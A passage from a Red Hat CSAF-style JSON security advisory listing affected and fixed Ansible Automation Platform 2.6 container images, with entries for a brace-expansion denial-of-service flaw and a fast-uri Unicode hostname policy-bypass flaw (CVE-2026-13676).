"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "brace-expansion: Brace-expansion: Denial of Service due to exponential-time complexity"
},
{
"cve": "CVE-2026-13676",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-06-29T14:01:55.592330+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2494197"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-uri. This vulnerability occurs because fast-uri fails to properly convert Unicode (Internationalized Domain Name - IDN) hostnames for HTTP-family URLs. This can lead to a situation where security policies, such as denylists or redirect validations, are bypassed when applications use fast-uri to enforce these policies before passing the URL to another parser. A remote attacker could exploit this to circumvent security controls and potentially access unauthorized resources or perform malicious redirects.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-uri: fast-uri: Security policy bypass due to improper Unicode hostname canonicalization",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in `fast-uri` allows a remote attacker to bypass host-based security policies. Applications that rely on `fast-uri` for URL parsing and policy enforcement, such as denylists or redirect validations, can be circumvented due to inconsistent handling of Unicode hostnames. This discrepancy between `fast-uri` and other URL parsers could lead to unauthorized resource access or malicious redirects in affected Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le"
],
"known_not_affected": [
